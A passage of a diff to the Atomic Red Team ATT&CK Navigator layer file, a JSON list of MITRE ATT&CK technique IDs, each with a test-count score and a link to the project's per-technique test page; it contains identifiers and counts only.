Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":117,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View 